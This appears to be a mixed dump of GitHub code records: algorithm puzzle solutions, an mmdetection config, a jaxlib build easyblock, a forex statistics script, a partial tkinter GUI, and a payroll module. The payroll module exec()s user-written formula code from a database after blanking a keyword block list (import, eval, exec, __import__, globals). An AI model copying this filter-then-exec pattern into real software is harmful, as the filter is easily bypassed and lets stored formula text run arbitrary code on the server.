1 to the right:\n if binaryMatrix.get(i, mid) == 0:\n start = mid + 1\n # Go to the left to see if there is a 1 that's closer to the left:\n else:\n one_col_ind = mid\n end = mid - 1\n\n if one_col_ind != -1:\n if one_col_ind == 0:\n return 0\n elif one_col_ind < min_one_col_ind:\n min_one_col_ind = one_col_ind\n return -1 if (min_one_col_ind == cols) else min_one_col_ind\n\n# This is a much smarter algorithm that runs in O(rows + cols) time and still has O(1) space complexity.\n# This was from a Leetcode hint.\ndef leftmost_column_with_one_v2(binaryMatrix: 'BinaryMatrix') -> int:\n rows, cols = binaryMatrix.dimensions()\n ind = [0, cols - 1]\n min_one_col_ind = cols\n while (ind[0] < rows) and (ind[1] >= 0):\n if binaryMatrix.get(ind[0], ind[1]) == 1:\n min_one_col_ind = ind[1]\n ind[1] -= 1\n else:\n ind[0] += 1\n return -1 if (min_one_col_ind == cols) else min_one_col_ind\n\n# Expected: 0\nprint(leftmost_column_with_one(BinaryMatrix([[0,0],[1,1]])))\n# Expected: 1\nprint(leftmost_column_with_one(BinaryMatrix([[0,0],[0,1]])))\n# Expected: -1\nprint(leftmost_column_with_one(BinaryMatrix([[0,0],[0,0]])))\n# Expected: 1\nprint(leftmost_column_with_one(BinaryMatrix([[0,0,0,1],[0,0,1,1],[0,1,1,1]])))\n\nprint(leftmost_column_with_one_v2(BinaryMatrix([[0,0],[1,1]])))\nprint(leftmost_column_with_one_v2(BinaryMatrix([[0,0],[0,1]])))\nprint(leftmost_column_with_one_v2(BinaryMatrix([[0,0],[0,0]])))\nprint(leftmost_column_with_one_v2(BinaryMatrix([[0,0,0,1],[0,0,1,1],[0,1,1,1]])))\n","repo_name":"abespitalny/CodingPuzzles","sub_path":"Leetcode/leftmost_column_with_at_least_a_one.py","file_name":"leftmost_column_with_at_least_a_one.py","file_ext":"py","file_size_in_byte":3201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"33310761459","text":"# coding:utf-8\n\nfrom ..pysysutils import global_variables as gv\nfrom copy import deepcopy\nfrom sqlalchemy import select\nfrom sqlalchemy import text\nfrom decimal import Decimal\nfrom ..pyfunctions import *\nfrom ..pyfunctions import __all__ as func_list\nfrom ..pysysutils.py_calc_log import log\nfrom datetime import timedelta, date\n\none_day = timedelta(days=1)\n\n\n# 根据系统ID和公式ID获取一个实例化的公式\ndef select_formula(tenant_id, formula_id):\n \"\"\"根据系统ID和公式ID在数据库中查找出对应公式的配置数据,并实例化\"\"\"\n\n # 基类的字符串,根据数据动态生成公式对象\n class_string_m = \"\"\"\nclass FormulaObject():\n\n def __init__(self):\n # 租户ID\n self.tenant_id = ''\n # 公式唯一id\n self.id = ''\n # 公式所属国家ALL:所有国家 CHN:中国\n self.country = ''\n # 公式描述,用于系统中的描述\n self.desc = ''\n # 公式英文描述,用于系统中的描述\n self.descENG = ''\n # 公式使用中文说明\n self.instructions = ''\n # 公式使用英文说明\n self.instructionsENG = ''\n # 用户编写的原始代码\n self.cus_code_string = ''\n \n @log()\n def formula_exec(self):\n var = gv.get_variable_dic()\n pin_dic = gv.get_pin_dic()\n pin_acc_dic = gv.get_pin_acc_dic()\n # print('current formula id:' + self.id)\n %1\n\nclass_meta=FormulaObject()\n \"\"\"\n\n db = gv.get_db()\n t = db.get_table('hhr_py_formula', schema_name='boogoo_payroll')\n\n stmt = select([t.c.tenant_id, t.c.hhr_formula_id, t.c.hhr_country, t.c.hhr_description, t.c.hhr_cum_code],\n (t.c.tenant_id == tenant_id) & (t.c.hhr_formula_id == formula_id))\n\n result = db.conn.execute(stmt).fetchone()\n\n if result is not None:\n cus_code_str = result['hhr_cum_code']\n cus_code_str = cus_code_str.replace('\\n', '\\n ')\n cus_code_str = cus_code_str.replace('\\t', ' ')\n class_string = class_string_m.replace('%1', trans_cus_code(cus_code_str))\n _locals = locals()\n exec(class_string, globals(), _locals)\n formula_class = _locals['class_meta']\n formula_class.tenant_id = result['tenant_id']\n formula_class.id = result['hhr_formula_id']\n formula_class.country = result['hhr_country']\n formula_class.desc = result['hhr_description']\n formula_class.cus_code_string = result['hhr_cum_code']\n formula_class.function_list = list()\n formula_class.variable_list = list()\n formula_class.pin_list = list()\n formula_class.pin_acc_list = list()\n\n log_flag = gv.get_run_var_value('LOG_FLAG')\n if log_flag == 'Y':\n formula_class.trace_dic = {\n 'id': formula_class.id,\n 'desc': formula_class.desc,\n 'type': 'FM',\n 'fm_obj': formula_class\n }\n else:\n formula_class.trace_dic = {}\n\n add_lists(formula_class)\n return formula_class\n else:\n pass\n\n\ndef validate_pins(formula_class):\n \"\"\"\n 校验公式包含的所有薪资项目是否都在员工的使用范围和通用薪资项目中\n :param formula_class:公式对象\n :return:\n \"\"\"\n try:\n pin_dic = gv.get_pin_dic()\n for pin_id in formula_class.pin_list:\n if pin_id not in pin_dic:\n raise Exception(\"薪资项目\" + pin_id + \",不在适用范围\")\n except Exception:\n raise\n\n\ndef add_lists(formula_class):\n \"\"\"\n 给公式对象添加function_list,variable_list,pin_list。\n :param formula_class:公式对象\n :return:\n \"\"\"\n sql = text(\"select hhr_fvp_id,hhr_fvp_type from boogoo_payroll.hhr_py_formula_fvp_list a where tenant_id=:b1 and hhr_formula_id=:b2\")\n\n result = gv.get_db().conn.execute(sql, b1=formula_class.tenant_id, b2=formula_class.id).fetchall()\n if result is not None:\n for result_line in result:\n if result_line['hhr_fvp_type'] == 'FC':\n formula_class.function_list.append(result_line['hhr_fvp_id'])\n elif result_line['hhr_fvp_type'] == 'VR':\n formula_class.variable_list.append(result_line['hhr_fvp_id'])\n elif result_line['hhr_fvp_type'] == 'WT':\n formula_class.pin_list.append(result_line['hhr_fvp_id'])\n elif result_line['hhr_fvp_type'] == 'WC':\n formula_class.pin_acc_list.append(result_line['hhr_fvp_id'])\n\n\n# 处理用户自定义的公式代码\ndef trans_cus_code(code_string):\n \"\"\"处理用户自己写的代码,替换为可执行代码\"\"\"\n\n code_string = code_string.replace('WT[', \"pin_dic[\")\n code_string = code_string.replace('WC[', \"pin_acc_dic[\")\n code_string = code_string.replace('from', \"# \")\n code_string = code_string.replace('import', \"# \")\n code_string = code_string.replace('replace', \" \")\n code_string = code_string.replace('exit', \" \")\n code_string = code_string.replace('eval', \" \")\n code_string = code_string.replace('exec', \" \")\n code_string = code_string.replace('compile', \" \")\n code_string = code_string.replace('__import__', \" \")\n code_string = code_string.replace('globals', \" \")\n code_string = code_string.replace('locals', \" \")\n code_string = code_string.replace('raw_input', \" \")\n code_string = code_string.replace('input', \" \")\n\n code_string = code_string.replace('VR[', 'var[')\n for func in func_list:\n code_string = code_string.replace(func + \"(\", func + '.PyFunction().func_exec(')\n\n return code_string\n\n\n# 创建公式实例\ndef create(tenant_id, formula_id):\n formula_dic = gv.get_run_var_value('ALL_FORMULA_DIC')\n\n log_flag = gv.get_run_var_value('LOG_FLAG')\n pre_log_flag = gv.get_run_var_value('PRE_LOG_FLAG')\n if log_flag != pre_log_flag:\n new_formula = select_formula(tenant_id, formula_id)\n formula_dic[formula_id] = new_formula\n return new_formula\n else:\n \"\"\"创建公式实例,如果已经存在,则在字典中获取\"\"\"\n if formula_id not in formula_dic:\n formula_dic[formula_id] = select_formula(tenant_id, formula_id)\n return formula_dic[formula_id]\n\n\ndef copy_wt(src_wt_obj, tgt_wt_obj):\n tgt_pin_id = tgt_wt_obj.pin_id\n tgt_wt_obj = deepcopy(src_wt_obj)\n tgt_wt_obj.pin_id = tgt_pin_id\n","repo_name":"pmxly/pypayroll","sub_path":"payroll/pyformulas/create_formula.py","file_name":"create_formula.py","file_ext":"py","file_size_in_byte":6503,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"12243243583","text":"'''\nSame description as word_ladder.py except:\n\nGiven two words, beginWord and endWord, and a dictionary wordList, return all the shortest transformation sequences\nfrom beginWord to endWord, or an empty list if no such sequence exists.\n\nEach sequence should be returned as a list of the words [beginWord, s1, s2, ..., sk].\n'''\nfrom leetcode import *\n\nclass Solution:\n # Time: O(m*n + m*n + A) where m is the length of words, n is the number of words in list, and A is the number of shortest transformations.\n # Space: O(m*(m*n) + m*n + n) [basically, hash tables + visited/queue sets + backtracking stack] = O(m*(m*n)).\n def findLadders(self, beginWord: str, endWord: str, wordList: List[str]) -> List[List[str]]:\n wordList.append(beginWord)\n wordToGeneric = {word: [] for word in wordList}\n\n if endWord not in wordToGeneric:\n return []\n\n genericToWord = {}\n for i in range(len(wordList)):\n word = list(wordList[i])\n\n for j in range(len(beginWord)):\n temp = word[j]\n word[j] = '*'\n generic = ''.join(word)\n\n wordToGeneric[wordList[i]].append(generic)\n words = genericToWord.get(generic, set())\n words.add(wordList[i])\n genericToWord[generic] = words\n\n word[j] = temp\n\n visited = {beginWord: None}\n queue = {beginWord}\n while len(queue) != 0:\n nextQueue = set()\n for wordi in queue:\n if wordi == endWord:\n break\n\n for generic in wordToGeneric[wordi]:\n for wordj in genericToWord[generic]:\n if wordj not in visited:\n nextQueue.add(wordj)\n visited[wordj] = {wordi}\n elif wordj in nextQueue and wordi not in visited[wordj]:\n visited[wordj].add(wordi)\n\n queue = nextQueue\n\n\n ladders = []\n def dfs(startWord, path):\n path.append(startWord)\n\n if visited[startWord] is None:\n ladders.append(list(reversed(path)))\n else:\n for word in visited[startWord]:\n dfs(word, path)\n\n path.pop()\n return\n\n if endWord not in visited:\n return ladders\n\n dfs(endWord, [])\n return ladders\n\nsolution = Solution()\n\n# Expected: [[\"hit\",\"hot\",\"dot\",\"dog\",\"cog\"],[\"hit\",\"hot\",\"lot\",\"log\",\"cog\"]]\nprint(solution.findLadders(beginWord = \"hit\", endWord = \"cog\", wordList = [\"hot\",\"dot\",\"dog\",\"lot\",\"log\",\"cog\"]))\n\n# Expected: []\nprint(solution.findLadders(beginWord = \"hit\", endWord = \"cog\", wordList = [\"hot\",\"dot\",\"dog\",\"lot\",\"log\"]))\n","repo_name":"abespitalny/CodingPuzzles","sub_path":"Leetcode/word_ladder_II.py","file_name":"word_ladder_II.py","file_ext":"py","file_size_in_byte":2799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"10902703609","text":"\ncheckpoint_config = dict(interval=8, max_keep_ckpts=3)\n\n# yapf:disable\nlog_config = dict(\n interval=50,\n hooks=[\n dict(type='TextLoggerHook'), \n dict(\n type='WandbLoggerHook',\n init_kwargs=dict(\n project='one-stage-model',\n name='LIM-deformable-DETR-SGD',\n entity='canvas11')\n )\n ])\n# yapf:enable\ncustom_hooks = [dict(type='NumClassCheckHook')]\n\ndist_params = dict(backend='nccl')\nlog_level = 'INFO'\nload_from ='https://download.openmmlab.com/mmdetection/v2.0/deformable_detr/deformable_detr_twostage_refine_r50_16x2_50e_coco/deformable_detr_twostage_refine_r50_16x2_50e_coco_20210419_220613-9d28ab72.pth'\nresume_from = None\nworkflow = [('train', 1)]\n\nevaluation = dict(interval=1, metric='bbox', save_best='bbox_mAP_50')\n","repo_name":"boostcampaitech3/level2-object-detection-level2-cv-11","sub_path":"selim/universeNet/configs/_deformable_detr/detr_runtime.py","file_name":"detr_runtime.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"70"}
+{"seq_id":"14997588474","text":"'''\nleetcode 2812题: https://leetcode.com/problems/find-the-safest-path-in-a-grid/\n求最高系数的路径 \n\n两个cell的绝对距离 |x1-x2| + |y1 + y2|\n\n需要首先知道小偷位置, 其次需要寻找曼哈顿距离最短的路径\n也需要知道是否能走得通\n\n\n二分答案\n\n最大化离1的最近距离\n1. 标记不能的格子(也就是1格周围到二分答案的值范围内所有格子都是不能走的)\n2. 如何判断能走到右下角\n\n接近O(n^2)\n把距离1的格子按距离表上数值\n'''\n\n\nclass Solution:\n def maximumSafenessFactor(self, grid: list[list[int]]) -> int:\n n = len(grid)\n # 多源bfs:\n\n # 标有距离的矩阵\n dis = [[-1] * n for _ in range(n)]\n q = []\n for i, row in enumerate(grid):\n for j, x in enumerate(row):\n if x:\n q.append((i, j))\n dis[i][j] = 0\n\n # 利用滚动数组去做多源bfs\n groups = [q]\n while q:\n temp = q\n q = []\n for x, y in temp:\n for dx,dy in zip([-1,0,1,0], [0,-1,0,1]):\n nx,ny = x+dx,y+dy\n if 0 <= nx < n and 0 <= ny < n and grid[nx][ny] == 0 and dis[nx][ny] == -1:\n dis[nx][ny] = dis[x][y] + 1\n q.append((nx,ny))\n # 这里会将每次计算出的新坐标加入group中。\n groups.append(q)\n\n # 并查集模板\n fa = list(range(n * n))\n def find(x: int) -> int:\n if fa[x] != x:\n fa[x] = find(fa[x])\n return fa[x]\n\n # 因为最后一个group是空的所以从倒数第二个开始,如果在d的距离能走到右下角就返回d。\n for d in range(len(groups) - 2, 0, -1):\n for i, j in groups[d]:\n for x, y in (i + 1, j), (i - 1, j), (i, j + 1), (i, j - 1):\n # 除了判断边界, 还得确保能走的格子是大于等于自己的 dis[x][y] >= dis[i][j]\n if 0 <= x < n and 0 <= y < n and dis[x][y] >= dis[i][j]:\n fa[find(x * n + y)] = find(i * n + j) # merge的操作\n if find(0) == find(n * n - 1): # 写这里判断更快些\n return d\n return 0","repo_name":"FuntestechGithub/algorithm","sub_path":"算法/提高算法模版/搜索/多源bfs/多源bfs-应用-找出最安全路径.py","file_name":"多源bfs-应用-找出最安全路径.py","file_ext":"py","file_size_in_byte":2308,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"31325283294","text":"import os\nimport tempfile\n\nfrom distutils.version import LooseVersion\n\nimport easybuild.tools.environment as env\nfrom easybuild.easyblocks.generic.pythonpackage import PythonPackage\nfrom easybuild.framework.easyconfig import CUSTOM\nfrom easybuild.tools.build_log import EasyBuildError\nfrom easybuild.tools.filetools import apply_regex_substitutions, which\nfrom easybuild.tools.modules import get_software_root, get_software_version\n\n\nclass EB_jaxlib(PythonPackage):\n \"\"\"Support for installing jaxlib. Extension of the existing PythonPackage easyblock\"\"\"\n\n @staticmethod\n def extra_options():\n \"\"\"Custom easyconfig parameters specific to jaxlib.\"\"\"\n extra_vars = PythonPackage.extra_options()\n\n extra_vars['use_pip'][0] = True\n # Run custom build script and install the generated whl file\n extra_vars['buildcmd'][0] = '%(python)s build/build.py'\n extra_vars['install_src'][0] = 'dist/*.whl'\n\n # Custom parameters\n extra_vars.update({\n 'use_mkl_dnn': [True, \"Enable support for Intel MKL-DNN\", CUSTOM],\n })\n\n return extra_vars\n\n def configure_step(self):\n \"\"\"Custom configure step for jaxlib.\"\"\"\n\n super(EB_jaxlib, self).configure_step()\n\n binutils_root = get_software_root('binutils')\n if not binutils_root:\n raise EasyBuildError(\"Failed to determine installation prefix for binutils\")\n config_env_vars = {\n # This is the binutils bin folder: https://github.com/tensorflow/tensorflow/issues/39263\n 'GCC_HOST_COMPILER_PREFIX': os.path.join(binutils_root, 'bin'),\n }\n\n # Collect options for the build script\n # Used only by the build script\n\n # C++ flags are set through copt below\n options = ['--target_cpu_features=default']\n\n # Passed directly to bazel\n bazel_startup_options = [\n '--output_user_root=%s' % tempfile.mkdtemp(suffix='-bazel', dir=self.builddir),\n ]\n\n # Passed to the build command of bazel\n bazel_options = [\n '--jobs=%s' % self.cfg['parallel'],\n '--subcommands',\n '--action_env=PYTHONPATH',\n '--action_env=EBPYTHONPREFIXES',\n ]\n if self.toolchain.options.get('debug', None):\n bazel_options.extend([\n '--strip=never',\n '--copt=\"-Og\"'\n ])\n # Add optimization flags set by EasyBuild each as a separate option\n bazel_options.extend(['--copt=%s' % i for i in os.environ['CXXFLAGS'].split(' ')])\n\n cuda_root = get_software_root('CUDA')\n if cuda_root:\n cudnn_root = get_software_root('cuDNN')\n if not cudnn_root:\n raise EasyBuildError('For CUDA-enabled builds cuDNN is also required')\n cuda_version = '.'.join(get_software_version('CUDA').split('.')[:2]) # maj.minor\n cudnn_version = '.'.join(get_software_version('cuDNN').split('.')[:3]) # maj.minor.patch\n options.extend([\n '--enable_cuda',\n '--cuda_path=' + cuda_root,\n '--cuda_compute_capabilities=' + self.cfg.get_cuda_cc_template_value('cuda_compute_capabilities'),\n '--cuda_version=' + cuda_version,\n '--cudnn_path=' + cudnn_root,\n '--cudnn_version=' + cudnn_version,\n ])\n\n if LooseVersion(self.version) >= LooseVersion('0.1.70'):\n nccl_root = get_software_root('NCCL')\n if nccl_root:\n options.append('--enable_nccl')\n else:\n options.append('--noenable_nccl')\n\n config_env_vars['GCC_HOST_COMPILER_PATH'] = which(os.getenv('CC'))\n else:\n options.append('--noenable_cuda')\n\n if self.cfg['use_mkl_dnn']:\n options.append('--enable_mkl_dnn')\n else:\n options.append('--noenable_mkl_dnn')\n\n # Prepend to buildopts so users can overwrite this\n self.cfg['buildopts'] = ' '.join(\n options +\n ['--bazel_startup_options=\"%s\"' % i for i in bazel_startup_options] +\n ['--bazel_options=\"%s\"' % i for i in bazel_options] +\n [self.cfg['buildopts']]\n )\n\n for key, val in sorted(config_env_vars.items()):\n env.setvar(key, val)\n\n # Print output of build at the end\n apply_regex_substitutions('build/build.py', [(r' shell\\(command\\)', ' print(shell(command))')])\n","repo_name":"easybuilders/easybuild-easyblocks","sub_path":"easybuild/easyblocks/j/jaxlib.py","file_name":"jaxlib.py","file_ext":"py","file_size_in_byte":4519,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"70"}
+{"seq_id":"30960694069","text":"Q = 10**9+7\ndef cmb(n,r):\n if n-r < r: r = n-r\n if r == 0: return 1\n denominator = 1 #分母\n numerator = 1 #分子\n for i in range(r):\n numerator *= n-i\n numerator %= Q\n denominator *= i+1\n denominator %= Q\n return numerator*pow(denominator, Q-2, Q)%Q\n\ndef main():\n N, M = map( int, input().split())\n A = list(map(int,input().split()))\n n = N + M\n r = N + sum(A)\n if sum(A) > M:\n print(0)\n return\n \n print(cmb(n,r))\nif __name__ == '__main__':\n main()\n","repo_name":"kamojiro/atcoderall","sub_path":"regular/110/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"70135916708","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy\nfrom os import listdir, getcwd, makedirs, name, pardir\nfrom os.path import isfile, isdir, join, splitext, basename, abspath, exists\nfrom math import log10, floor\nfrom collections import defaultdict\nimport csv\n\nQUIET = False\n\n#***** Global Variables *****\n#Data paths\ncwd = getcwd()\n\n# ***** Constants *****\nPARENT = parent = abspath(join(cwd, pardir))\n#root data directory\nDATA_DIR = join(parent, \"data\")\n#directory containing currency spread data\t\nSPREAD_DATA_DIR = join(DATA_DIR, \"processed-data\")\t\n#directory containing the statistics data\nSTATS_DIR = join(DATA_DIR, \"currency-stats\")\n\n#List of all years and months considered for data directories\nyears = [2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016, 2017]\nmonths = [\"January\", \"February\", \"March\", \"April\", \"May\", \"June\", \"July\", \"August\", \"September\", \"October\", \"November\", \"December\" ]\n#Save cutoff points for each currency based on the base year\ncutoff_points = {\"AUDJPY\": 0.06, \"AUDUSD\": 0.00045, \"EURAUD\": 0.0009, \\\n\t\t\t\t\"EURGBP\": 0.00027, \"EURJPY\": 0.04, \"EURUSD\": 0.0003,\\\n\t\t\t\t\"GBPAUD\": 0.0009, \"GBPJPY\": 0.07, \"GBPUSD\": 0.0004, \\\n\t\t\t\t\"USDJPY\": 0.03}\nMAX_BINS = 50 #Maximum number of data bins to use\n\n\nclass CurrencyStats:\n\tdef __init__(self, currency=\"Currency\", df={'spread': [1,2,3]}, year=\"Year\", month=\"Month\"):\n\t\tself.full_name = currency\n\t\t#Get the 6-character currency name from the cross filename\n\t\tself.short_name = currency.split('_', 1)[0]\n\t\tself.readable_name = self.short_name[:3] + \"/\" + self.short_name[3:]\n\t\tself.year = year\n\t\tself.month = month\n\t\ttry:\n\t\t\tself.mean = df.spread.mean()\n\t\t\tself.std_dev = df.spread.std()\n\t\t\tself.min = df.spread.min()\n\t\t\tself.max = df.spread.max()\n\t\t\t#The cutoff value for the last bin is pulled from a pre-defined dictionary\n\t\t\tself.cutoff = cutoff_points[self.short_name]\n\n\t\t\t'''Non-outlier data is defined as all values less than or equal to\n\t\t\tthe cutoff point for the currency'''\n\t\t\tnon_outlier = df.spread <= self.cutoff\n\t\t\tnon_outlier_frame = df[non_outlier]\n\n\t\t\t#Bin based on unique values up to a cutoff point\n\t\t\tself.bins = non_outlier_frame.spread.nunique()\n\t\t\t#self.bins = df.spread.nunique()\n\n\t\t\t#Total number of ticks for the currency\n\t\t\tself.ticks = df.spread.count()\n\n\t\t\t#Clipped data allows for binning outlier values\n\t\t\tself.clipped_data = numpy.clip(\\\n\t\t\t\tdf.spread, df.spread.min(), self.cutoff)\n\n\t\t\t#List of most freqent bid-ask values\n\t\t\tself.frequent_values = []\n\t\texcept:\n\t\t\tself.mean = 0\n\t\t\tself.std_dev = 0\n\t\t\tself.min = 0\n\t\t\tself.max = 0\n\t\t\tself.cutoff = 0\n\t\t\tself.bins = 0\n\t\t\tself.ticks = 0\n\t\t\tself.frequent_values = []\n\t\t\t#self.clipped_data = None\n\n\t'''Save in currency data from a csv file row'''\n\tdef loadData(self, d):\n\t\tself.full_name = d[0]\n\t\tself.short_name = d[1]\n\t\tself.readable_name = d[2]\n\t\tself.year = d[3]\n\t\tself.month = d[4]\n\t\tself.mean = float(d[5])\n\t\tself.std_dev = float(d[6])\n\t\tself.min = float(d[7])\n\t\tself.max = float(d[8])\n\t\tself.cutoff = float(d[9])\n\t\tself.bins = int(d[10])\n\n#Read in the header of a csv file and return it as a list\ndef readHeader(file):\n\theader = []\n\twith open (file, 'r+') as csvfile:\n\t\treader = csv.reader(csvfile)\n\t\theader = next(reader)\n\treturn header\n\n#Read the first @samples number of cells in the given column, and return the\n#highest number of decimal points encountered in any of the samples\ndef getColumnPrecision(dataframe, column, samples):\n\tprecision = 0\n\tfor i in range(0, samples):\n\t\tval = str(dataframe[column][i])\n\t\t#Get number of values after the decimal\n\t\tvalStr = val.split('.')[1]\n\t\tif (len(valStr) > precision):\n\t\t\tprecision = len(valStr)\n\treturn precision\n\n\n'''\nGenerate the statistics data for all currencies in a directory\nArguments:\n\t* stats_list: list of Stats objects to be generated\n\t* SPREAD_DATA_DIR: root directory containing yearly cross directories\n'''\ndef genStatsData(stats_list, month_dir, month, year):\n\tfor currency in listdir(month_dir):\n\t\tprint(\"Generating stats for {}\".format(currency))\n\t\tstats = CurrencyStats\n\t\tcurrency_path = join(month_dir, currency)\n\t\tdf = pd.read_csv(currency_path, sep=',', \\\n\t\t\tfloat_precision=\"round_trip\",usecols=[\"spread\"])\n\t\tstats = CurrencyStats(currency, df, year, month)\n\t\tstats_list[stats.short_name].append(stats)\n\treturn stats_list\n\n'''Save all generated statistics data for currency files'''\ndef saveStatsData(dir, filename, stats_list):\n\tfilepath = join(dir, filename)\n\t#If file doesn't exist, create it and write the header\n\tif not exists(filepath):\n\t\twith open(filepath, 'w+', newline='\\n') as file:\n\t\t\twriter = csv.writer(file)\n\t\t\twriter.writerow([\"Full name\"] + [\"Short Name\"] + [\"Readable Name\"] + \\\n\t\t\t[\"Year\"] + [\"Month\"] + [\"Mean\"] + [\"Std Dev\"] + [\"Min\"] + [\"Max\"] + \\\n\t\t\t[\"Cutoff\"] + [\"Bins\"] + [\"Ticks\"])\n\t#Write data to file\n\tfor currency in stats_list.keys():\n\t\tfor stats in stats_list[currency]:\n\t\t\twith open(filepath, 'a+', newline='\\n') as file:\n\t\t\t\twriter = csv.writer(file)\n\t\t\t\twriter.writerow(\\\n\t\t\t\t\t[stats.full_name] + [stats.short_name] + \\\n\t\t\t\t\t[stats.readable_name] + [stats.year] + \\\n\t\t\t\t\t[stats.month] + [stats.mean] + \\\n\t\t\t\t\t[stats.std_dev] + [stats.min] + \\\n\t\t\t\t\t[stats.max] + [stats.cutoff] + [stats.bins] + \\\n\t\t\t\t\t[stats.ticks])\n\n'''Set the cutoff points for each currency to the base year cutoff value'''\ndef setCutoffs(stats_list):\n\tfor currency in stats_list.keys():\n\t\tfor stats in stats_list[currency]:\n\t\t\tstats.cutoff = cutoff_points[stats.short_name]\n\n'''Set the number of bins for each currency to the max number of bins in all years'''\ndef setBins(stats_list):\n\tfor currency in stats_list.keys():\n\t\tmax_currency_bins = 0\n\t\tfor stats in stats_list[currency]:\n\t\t\tif stats.bins > max_currency_bins:\n\t\t\t\tmax_currency_bins = stats.bins\n\t\tfor stats in stats_list[currency]:\n\t\t\tstats.bins = min(max_currency_bins, MAX_BINS)\n\n'''Generate the statistics data for the key set of currencies if it does not already exist.'''\ndef genStatsDataKeyYears(stats_list):\n\tfor month, year in sample_data:\n\t\tyear_dir = join(SPREAD_DATA_DIR, year)\n\t\tif not isdir(year_dir):\n\t\t\tprint(\"Error: directory \" + year_dir + \" not found. Skipping directory...\")\n\t\t\tcontinue\n\t\tmonth_dir = join(year_dir, month)\n\t\tcurrencies = [currency for currency in listdir(month_dir) if \\\n\t\t\t(isfile(join(month_dir, currency)))]\n\t\t#Generate statistics data for all currencies\n\t\tfor currency in currencies:\n\t\t\tstats = CurrencyStats\n\t\t\t#path to currency data\n\t\t\tcurrency_path = join(month_dir, currency)\n\t\t\t#read in the data\n\t\t\tdf = pd.read_csv(currency_path, sep=',', float_precision=\"round_trip\",\\\n\t\t\t\tusecols=[\"spread\"])\n\t\t\t#Generate statistics from the raw data\n\t\t\tstats = CurrencyStats(currency, df, year, month)\n\t\t\t'''Add the current currency stats to the dictionary list based on the short name of the currency'''\n\t\t\tstats_list[stats.short_name].append(stats)\n\treturn stats_list\n\ndef main():\n\tstats_list = defaultdict(list) #Dictionary of lists of currencies\n\n\tif not exists(STATS_DIR):\n\t\tprint(\"Creating stats directory...\")\n\t\tmakedirs(STATS_DIR)\n\n\t#Get a list of all directories to generate stats from \n\tyear_list = [year for year in listdir(SPREAD_DATA_DIR) if year in str(years)]\n\tfor year in year_list:\n\t\tyear_dir = join(SPREAD_DATA_DIR, year)\n\t\t#Generate monthly stats\n\t\tfor month in listdir(year_dir):\n\t\t\t#Only recurse into actual monthly data directories\n\t\t\tif month not in months:\n\t\t\t\tcontinue\n\t\t\tmonth_dir = join(year_dir, month)\n\t\t\tstats_list = genStatsData(stats_list, month_dir, month, year)\n\n\t\t\t#Save the raw statistics\n\t\t\t#saveStatsData(STATS_DIR, \"currency_statistics_raw.csv\", stats_list)\n\n\t\t\t#Save statistics with cutoff\n\t\t\tsaveStatsData(STATS_DIR, \"currency_statistics_outlier.csv\", stats_list)\n\n\t\t\t#Save a copy of the data with the altered bins\n\t\t\tsetCutoffs(stats_list)\n\t\t\tsetBins(stats_list)\n\t\t\tsaveStatsData(STATS_DIR, \"currency_statistics_50_bins.csv\", stats_list)\n\t\t\t\n\t\t\t#Clear the stats list\n\t\t\tstats_list = defaultdict(list)\n\t\n\tprint(\"Finished generating statistics...\")\n\t\n\nif (__name__ == \"__main__\"):\n\tmain()\n","repo_name":"kmboese/forex-market-analysis","sub_path":"src/gen_yearly_stats.py","file_name":"gen_yearly_stats.py","file_ext":"py","file_size_in_byte":7975,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"16595924516","text":"import tkinter as tk\r\nimport tkinter.ttk as ttk\r\nfrom tkinter.filedialog import *\r\nimport threading\r\nimport subprocess as sub\r\nimport os\r\nimport time\r\nimport ffmpy\r\n\r\n\r\ndef firstpage():\r\n global frame1\r\n global frame2\r\n global frame9\r\n global currentpage\r\n # sw = window.winfo_screenwidth()\r\n # sh = window.winfo_screenheight()\r\n # w = 700\r\n # h = 500\r\n # window.geometry(\"{0}x{1}+{2}+{3}\".format(w, h, int((sw - w) / 2), int((sh - h) / 2)))\r\n if currentpage != frame1:\r\n currentpage.pack_forget() # 取消显示当前界面,并不是销毁\r\n currentpage = frame1\r\n currentpage.pack() # 显示界面1\r\n\r\n\r\ndef secondpage():\r\n global frame1, frame2, frame9, currentpage\r\n # sw = window.winfo_screenwidth()\r\n # sh = window.winfo_screenheight()\r\n # w = 1080\r\n # h = 720\r\n # window.geometry(\"{0}x{1}+{2}+{3}\".format(w, h, int((sw - w) / 2), int((sh - h) / 2)))\r\n if currentpage != frame2:\r\n currentpage.pack_forget() # 取消显示当前界面,并不是销毁\r\n currentpage = frame2\r\n currentpage.pack() # 显示界面2\r\n\r\n\r\ndef threepage():\r\n global frame1, frame2, frame9, currentpage\r\n if currentpage != frame9:\r\n currentpage.pack_forget()\r\n currentpage = frame9\r\n currentpage.pack()\r\n\r\n\r\n# 按钮对应的功能\r\ndef create_frame():\r\n # 界面一\r\n global frame1, frame2, frame9, currentpage\r\n frame1 = tk.Frame(window, relief='sunken')\r\n frame3 = tk.Frame(frame1, relief=\"sunken\")\r\n frame4 = tk.Frame(frame1, relief=\"sunken\")\r\n frame5 = tk.Frame(frame1, relief='sunken')\r\n frame3.pack()\r\n frame4.pack()\r\n frame5.pack()\r\n\r\n def thread_it(func, *args):\r\n t = threading.Thread(target=func, args=args)\r\n t.daemon = True\r\n t.start()\r\n\r\n def thread_it1(func, *args):\r\n t1 = threading.Thread(target=func, args=args)\r\n t1.daemon = True\r\n t1.start()\r\n\r\n def thread_it2(func, *args):\r\n t2 = threading.Thread(target=func, args=args)\r\n t2.daemon = True\r\n t2.start()\r\n\r\n def conversion():\r\n listbox1.delete('0', 'end')\r\n listbox1.insert('0', '开始转换')\r\n source_file = entry3.get()\r\n name = source_file.split('/')[-1].split('.')[0]\r\n 